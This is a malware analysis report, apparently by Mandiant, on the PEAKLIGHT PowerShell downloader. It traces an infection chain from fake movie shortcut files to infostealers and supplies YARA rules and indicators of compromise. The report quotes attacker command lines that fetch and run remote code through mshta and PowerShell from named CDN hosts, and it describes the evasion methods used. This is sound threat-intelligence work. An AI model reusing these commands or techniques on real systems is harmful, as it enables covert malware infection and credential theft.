Written by: Aaron Lee, Praveeth DSouza
TL;DR
Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.
Overview
Mandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service infostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2 (LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a Microsoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the host. Mandiant named this final downloader PEAKLIGHT.
Figure 1: Infection chain
Infection Chain
Stage 1: Movie Lures; A Blast from the Past
In recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies. These archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in Figure 2:
* Video_mp4_[1080p].zip -> Full Movie 1080p HD.lnk
* @!Movie_HD_1080p_mp4_@!.zip -> Full Movie HD (1080p).lnk
* mp4_Full_Video_HD_1080p@!.zip -> Full Video (HD) mp4.lnk
Figure 2: Initial infection
During an associated investigation within a client environment, Mandiant identified anomalous outbound network activity to the IP address 62.133.61[.]56. The XML page seen in Figure 3 was subsequently discovered at the URL hxxp://62.133.61[.]56/Downloads.
Figure 3: XML markup
Of particular interest was this snippet from the XML markup, seen in Figure 4.
<D:propstat>
<D:prop>
<D:resourcetype></D:resourcetype>
<D:displayname>Full Video HD (1080p).lnk</D:displayname>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
<D:getetag>”17d6b3e5205a12a0460″</D:getetag>
<D:getcontentlength>1120</D:getcontentlength>
<D:getlastmodified>Fri, 07 Jun 2024 11:01:44 GMT</D:getlastmodified>
<D:supportedlock>
Figure 4: Forwarding mechanism
Based on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL hxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999). Mandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon (Figure 5).
Figure 5: LNK file configured with a media file icon
LNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing malware. These files can be disguised as legitimate documents or programs, making them effective for hiding in plain sight.
At this stage in the investigation, Mandiant identified different command variations within the parameters of the LNK file.
Variation 1
The parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to search for the file win.ini and execute a PowerShell script. Mandiant observed the execution of the following command (Figure 6):
mshta https://nextomax.b-cdn[.]net/nexto”
Figure 6: Initial PowerShell script variation 1
This command:
Uses the /p command switch for forfiles.exe to set the designated file search path to C:Windows.
Uses the /m command switch to look for files matching the name win.ini. Then, for each match (though on typical Windows installations there will only be one):
Starts powershell.exe with configurations to load a localized or dot-sourced script, which is signified by the “.” (in this case, the output generated by the rest of the command-line parameters).
Retrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.
Executes the retrieved payload via mshta.exe.
After executing this LNK file, Windows Media Player was opened on the affected host, and a video of a prominent film studio’s opening logo reel played automatically.
This video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably served as a “cover” video to attempt to alleviate suspicions that the affected host had, in reality, been infected with malware.
Variation 2
In a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell command that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved from a remote server.
.(gp -pa ‘HKLM:SOF*Clas*Applicationsmsh*e’).
(‘PSChildName’)hxxps://potexo.b-cdn[.]net/potexo
Figure 7: Initial PowerShell script variation 2
This command:
Runs a script signified by the dot sourcing operator “.“.
Uses the Get-ItemProperty (gp) to point to the Mshta registry hive and psChildName to specify the object, mshta.exe.
Retrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via mshta.exe.
The attackers employed the following evasion techniques to further cover their tracks:
System Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from a remote server, bypassing application control solutions and browser security settings.
Content Delivery Network Abuse: The attackers took advantage of a reputable content delivery network (Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to circumvent security filters that might not scrutinize traffic from known, trusted sources.
Both variations utilize MITRE ATT&CK® Technique T1218.005: System Binary Proxy Execution: Mshta.
Stage 2: JavaScript Dropper
Figure 8 shows analysis of the HTML file cached on the CDN contained an obfuscated memory-only JavaScript dropper.
Figure 8: JavaScript dropper layer 1
The script begins by assigning decimal-encoded ASCII characters to randomly named variables. The String.fromCharCode() function is then used to convert the decimal-encoded characters back into their corresponding ASCII characters to decode the JavaScript dropper embedded within the script.
Mandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.
Figure 9: JavaScript dropper layer 2
The script in Figure 9 carries out the following actions:
1. Decoding Function (wAJ)
The function receives an array of numbers, decodes each by subtracting 619, and then converts the result to its corresponding character using String.fromCharCode(). These characters are then combined to produce the final, decoded string, which is returned by the function.
2. Payload (KbX, YmD)
The variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.
3. ActiveXObject
The script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX object. This object grants the script system-level privileges to execute commands.
4. IMD.Run
Executes the decoded KbX command.
Parameters:
0: This parameter instructs the command to run in a hidden window, keeping its actions concealed from the user.
true: This parameter ensures the script waits for the command to complete its execution before moving on to any subsequent steps.
The payload (KbX) was abbreviated to maintain a concise presentation.
Note: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.
Variation 1: Hex-Encoded Payload
Figure 10: PowerShell hex-encoded payload
The first command conceals its malicious payload within a string of hexadecimal characters. The execution process adheres to the following sequence:
Stealthy PowerShell Launch: The command initiates PowerShell in a hidden window (-w 1), bypasses execution restrictions (-ep Unrestricted), and skips loading user profiles (-nop), ensuring covert operations.
Hex to Byte Conversion: A custom function (ffQiHkvB) is defined to transform the hexadecimal string into a byte array, a standard format for storing data.
Decryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key. The byte array is decrypted, revealing the actual PowerShell code.
Execution: Finally, the decrypted PowerShell code is executed.
Note: Mandiant decoded the payload using a custom CyberChef recipe.
Variation 2: Base64-Encoded Payload
Figure 11: PowerShell Base64-encoded payload
The second command follows a similar structure but with key differences: the malicious payload is encoded using Base64 instead of hexadecimal and is executed through a memory stream.
Stealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the same as in Variation 1.
Base64 Decoding: Instead of a custom function, this variant directly uses PowerShell’s built-in FromBase64String method to decode the payload.
Decryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a Base64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing the PowerShell code, which is subsequently executed.
Stage 3: PEAKLIGHT; The PowerShell Downloader
PEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded filenames and downloads files from a remote CDN if the files are not present.
During our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT script:
Target Directory:
Variation 1 downloads files to $env:AppData.
Variation 2 downloads files to $env:ProgramData.
Execution Logic:
Variation 1 executes the first alphabetically sorted file in the archive.
Variation 2 executes the first file found in the archive.
File Name:
Variation 1 downloads files as L1.zip and L2.zip.
Variation 2 downloads files as K1.zip and K2.zip.
Additional Actions:
Variation 1 also downloads an image (video.mp4) and makes a request to a remote server.
Variation 2 does not download an image file.
Note: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.
Variation 1
Figure 12: PEAKLIGHT variation 1
This PEAKLIGHT downloader is designed to execute the following tasks:
znY: Writes data to a file.
nbF: Extracts a ZIP archive and runs the first executable file inside.
aXR: Downloads data from an obfuscated URL.
jkg: Deobfuscates a string.
Main Function (AsD)
Video Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays the video. If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData folder, and then plays it.
Image Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png using Invoke-WebRequest.
ZIP File Handling:
It checks if L1.zip exists in the AppData folder.
If it exists, it extracts its contents to the AppData folder and runs the first executable file found within the ZIP.
If not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its contents, and runs the first executable.
It repeats the same process for L2.zip.
Analysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:
https://nextomax.b-cdn[.]net/video.mp4
https://nextomax.b-cdn[.]net/L1.zip
https://nextomax.b-cdn[.]net/L2.zip
https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
Variation 2
Figure 13: PEAKLIGHT variation 2
This PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.
The functions:
qXF($EGa, $aQU): The purpose of this function is to write data to a file.
Irl($EGa): Extracts a ZIP archive and runs an executable from it.
OBs($BYu): Downloads data from a URL.
Fzl($XFW): Deobfuscates an array of numbers into a string (likely a URL).
Main Execution (bSo function):
Defines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.
For each of these ZIP files, it checks if they already exist.
If the file exists, it simply unzips it using the Irl function.
If the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the ZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function Irl.
Analysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:
https://potexo.b-cdn[.]net/K1.zip
https://potexo.b-cdn[.]net/K2.zip
Additionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains hosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.
Stage 4: The Final Payload
Variation 1: L1.zip and L2.zip
Having explored the initial stages of the PEAKLIGHT downloader’s operation, our focus now shifts to the payload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three specific files: L1.zip, L2.zip, and video.mp4. Mandiant successfully acquired and extracted the contents of the files, as seen in Table 1.
Download
Extracted Content
Filename: L2.zip
Hash: 307f40ebc6d8a207455c96d34759f1f3
Type: Archive
Filename: Setup.exe
Hash: d8e21ac76b228ec144217d1e85df2693
Type: Win32 EXE
Filename: L1.zip
Hash: a6c4d2072961e9a8c98712c46be588f8
Type: Archive
Filename: LiteSkinUtils.dll
Hash: 059d94e8944eca4056e92d60f7044f14
Type: Win32 DLL
Filename: Bentonite.cfg
Hash: e7c43dc3ec4360374043b872f934ec9e
Type: PNG
Filename: Video.mp4
Hash: 91423dd4f34f759aaf82aa73fa202120
Type: Video
Table 1: Variant 1 downloaded files and extracted archive content
Setup.exe: This executable is a variant of the Cryptbot infostealer. Our analysis uncovered the following embedded URLs:
https://brewdogebar[.]com/code.vue
http://gceight8vt[.]top/upload.php
L1.zip contained the following:
bentonite.cfg: This file contains malware configurations that are linked to the SHADOWLADDER malware family.
LiteSkinUtils.dll: It is a malicious component used by SHADOWLADDER malware to facilitate the execution of its second-stage payload through dynamic-link library (DLL) side-loading.
Video.mp4
This file appears to be a legitimate movie trailer, likely used as a decoy to deceive the victim into believing that the downloaded files are safe.
Variation 2: K1.zip and K2.zip
The second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed downloading two archives: K1.zip and K2.zip.
Download
Extracted Content
Filename: K1.zip
Hash: b6b8164feca728db02e6b636162a2960
Type: Archive
Filename: toughie.txt
Hash: dfdc331e575dae6660d6ed3c03d214bd
Type: data
Filename: Aaaa.exe
Hash: b15bac961f62448c872e1dc6d3931016
Type: Win32 EXE
Filename: WCLDll.dll
Hash: 47eee41b822d953c47434377006e01fe
Type: Win32 DLL
Filename: C:UsersuserAppDataLocalTemperefgojgbu
Hash: d6ea5dcdb2f88a65399f87809f43f83c
Type: Win32 EXE
Filename: K2.zip
Hash: 236c709bbcb92aa30b7e67705ef7f55a
Type: Archive
Filename: Jfts.exe
Hash: b15bac961f62448c872e1dc6d3931016
Type: Win32 EXE
Table 2: Variant 2 downloaded files and extracted archive content
toughie.txt: This file contained configurations related to the SHADOWLADDER malware.
aaaa.exe & WCLDll.dll: These binaries are DLL files that SHADOWLADDER patches to leverage their HTTP download functionality.
K2.zip contained the following:
Jfts.exe: This file is a renamed copy of the previously mentioned aaaa.exe.
Upon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. This DLL then leverages the “More Utility” (more.com) to stealthily drop two additional files:
AppDataLocalTempHofla.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3.exe binary.
AppDataLocalTemperefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c): Further analysis of this files confirmed their association with the CRYPTBOT.AUTOIT malware.
Variation 3: Additional PEAKLIGHT Variant
Further analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This variant retrieves its payload,the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed breakdown of the contents within these archives is presented in Table 3.
Download
Extracted Content
Filename: K1.zip
Hash: bb9641e3035ae8c0ab6117ecc82b65a1
Type: Archive
Filename: cymophane.doc
Hash: f98e0d9599d40ed032ff16de242987ca
Type: ISO
Filename: WebView2Loader.dll
Hash: 58c4ba9385139785e9700898cb097538
Type: Win32 DLL
Filename: K2.zip
Hash: d7aff07e7cd20a5419f2411f6330f530
Type: Archive
Filename: hgjke.exe
Hash: c047ae13fc1e25bc494b17ca10aa179e
Type: Win32 EXE
Filename: AppDataLocalTempoqnhustu
Hash: 43939986a671821203bf9b6ba52a51b4
Type: Win32 EXE
Table 3: Variant 3 downloaded files and extracted archive content
cymophane.doc: This file contained configurations related to the SHADOWLADDER malware.
WebView2Loader.dll: This malicious DLL was observed to be dropped by the LummaC.V2 infostealer.
K2.zip contained the following:
Hgjke.exe: Identified as a renamed copy of the legitimate “JRiver Web Application” executable. During dynamic analysis, hgjke.exe was observed loading the malicious WebView2Loader.dll. Mandiant observed hgjke.exe utilize the comp.exe utility to drop two additional files:
AppDataLocalTempUfa.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3 binary.
AppDataLocalTempoqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4): Further analysis confirmed this file to be consistent with the LummaC.V2 payload.
Conclusion
PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was observed downloading payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT. The malware developers used several different obfuscation and evasion techniques, including system binary proxy execution and CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own unique characteristics.
We encourage security researchers to remain vigilant and share any insights or similar malware samples they encounter. By working together and fostering open communication within the cybersecurity community, we can better understand the evolving threat landscape and strengthen our collective defenses against future attacks.
Protect and scan your environment against the indicators of compromise and YARA rules in the following section. If you suspect that your environment may have been compromised, contact our Incident Response team for assistance.
Acknowledgements
We would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond Leong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable feedback.
Detections
Yara Rules
meta:
author = “Mandiant”
description = “This rule is desgined to detect on events that
exhibits indicators of utilizing AES encryption for payload obfuscation.”
target_entity = “Process”
strings:
$a = /($w+.Key(s|)=((s|)(w+|));|$w+.Key(s|)=(s|)w+(‘w+’);)/
$b = /$w+.IV/
$c = /System.Security.Cryptography.(AesManaged|Aes)/
condition:
all of them
}
meta:
mandiant_rule_id = “e0abae27-0816-446f-9475-1987ccbb1bc0”
author = Mandiant
category = “Malware”
description = “This rule is designed to detect on events related to peaklight.
PEAKLIGHT is an obfuscated PowerShell-based downloader which checks for
the presence of hard-coded filenames and downloads files from a remote CDN
if the files are not present.”
family = “Peaklight”
platform = “Windows”
strings:
$str1 = /functions{1,16}w{1,32}($w{1,32},s{1,4}$w{1,32})
{[IO.File]::WriteAllBytes($w{1,32},s{1,4}$w{1,32})}/ ascii wide
$str2 = /Expand-Archives{1,16}-Paths{1,16}$w{1,32}
s{1,16}-DestinationPath/ ascii wide
$str3 = /(w{1,32}s{1,4}@((d{3,6},){3,12}/ ascii wide
$str4 = “.DownloadData(” ascii wide
$str5 = “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12” ascii wide
$str6 = /.EndsWith((([“‘].zip[“‘])|((w{1,32}s{1,16}@((d{3,6},){3}d{3,6}))))/ ascii wide
$str7 = “Add -Type -Assembly System.IO.Compression.FileSystem” ascii wide
$str8 = “[IO.Compression.ZipFile]::OpenRead”
condition:
4 of them and filesize < 10KB
}
Indicators of Compromise (IOCs)
Network-Based IOCs
PEAKLIGHT NBIs:
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
hxxps://potexo.b-cdn[.]net/potexo
LUMMAC.V2 C2s:
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
detailbaconroollyws[.]shop
messtimetabledkolvk[.]shop
considerrycurrentyws[.]shop
understanndtytonyguw[.]shop
patternapplauderw[.]shop
horsedwollfedrwos[.]shop
tropicalironexpressiw[.]shop
CRYPTBOT C2s:
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue
SHADOWLADDER:
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://fatodex.b-cdn[.]net/K1.zip
hxxps://fatodex.b-cdn[.]net/K2.zip
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
hxxps://matodown.b-cdn[.]net/K1.zip
hxxps://matodown.b-cdn[.]net/K2.zip
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://nextomax.b-cdn[.]net/L2.zip
hxxps://potexo.b-cdn[.]net/K1.zip
hxxps://potexo.b-cdn[.]net/K2.zip
Host-Based IOCs
CRYPTBOT:
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)
LUMMAC.V2:
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)
PEAKLIGHT:
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)
SHADOWLADDER:
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)
K1.zip (MD5: b6b8164feca728db02e6b636162a2960)
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)